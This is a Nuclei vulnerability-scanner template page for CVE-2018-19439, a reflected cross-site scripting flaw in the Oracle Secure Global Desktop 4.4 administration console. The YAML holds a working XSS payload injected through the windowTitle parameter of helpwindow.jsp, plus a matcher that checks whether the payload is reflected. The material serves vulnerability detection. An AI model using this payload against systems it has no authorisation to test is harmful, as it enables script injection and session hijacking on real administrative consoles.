Skip to content
Nuclei Templates

Oracle Secure Global Desktop Administration Console 4.4 - Cross-Site Scripting

ID: CVE-2018-19439

Severity: medium

Author: madrobot,dwisiswant0

Tags: cve,cve2018,oracle,xss,seclists,packetstorm

Description

Section titled “Description”

Oracle Secure Global Desktop Administration Console 4.4 contains a reflected cross-site scripting vulnerability in helpwindow.jsp via all parameters, as demonstrated by the sgdadmin/faces/com_sun_web_ui/help/helpwindow.jsp windowTitle parameter.

YAML Source

Section titled “YAML Source”
id: CVE-2018-19439


info:
  name: Oracle Secure Global Desktop Administration Console 4.4 - Cross-Site Scripting
  author: madrobot,dwisiswant0
  severity: medium
  description: Oracle Secure Global Desktop Administration Console 4.4 contains a reflected cross-site scripting vulnerability in helpwindow.jsp via all parameters, as demonstrated by the sgdadmin/faces/com_sun_web_ui/help/helpwindow.jsp windowTitle parameter.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the victim's browser, potentially leading to session hijacking or unauthorized actions.
  remediation: Fixed in later versions including 5.4.
  reference:
    - http://packetstormsecurity.com/files/150444/Oracle-Secure-Global-Desktop-Administration-Console-4.4-Cross-Site-Scripting.html
    - https://nvd.nist.gov/vuln/detail/CVE-2018-19439
    - http://seclists.org/fulldisclosure/2018/Nov/58
    - https://github.com/sobinge/nuclei-templates
    - https://github.com/ARPSyndicate/cvemon
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2018-19439
    cwe-id: CWE-79
    epss-score: 0.0038
    epss-percentile: 0.72872
    cpe: cpe:2.3:a:oracle:secure_global_desktop:4.4:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: oracle
    product: secure_global_desktop
  tags: cve,cve2018,oracle,xss,seclists,packetstorm


http:
  - method: GET
    path:
      - "{{BaseURL}}/sgdadmin/faces/com_sun_web_ui/help/helpwindow.jsp?=&windowTitle=AdministratorHelpWindow></TITLE></HEAD><body><script>alert(1337)</script><!--&>helpFile=concepts.html"


    matchers:
      - type: word
        part: body
        words:
          - "<script>alert(1337)</script><!--</TITLE>"
# digest: 490a00463044022041362874a5fd44a4b29f1a0f0da8fcb6df810a82a73693a2a94275c4d6fb729e02206a020f71fac55142e35878ea8959f4a9ab698a62962cb494fdcae3ba861ae11a:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2018/CVE-2018-19439.yaml"

View on Github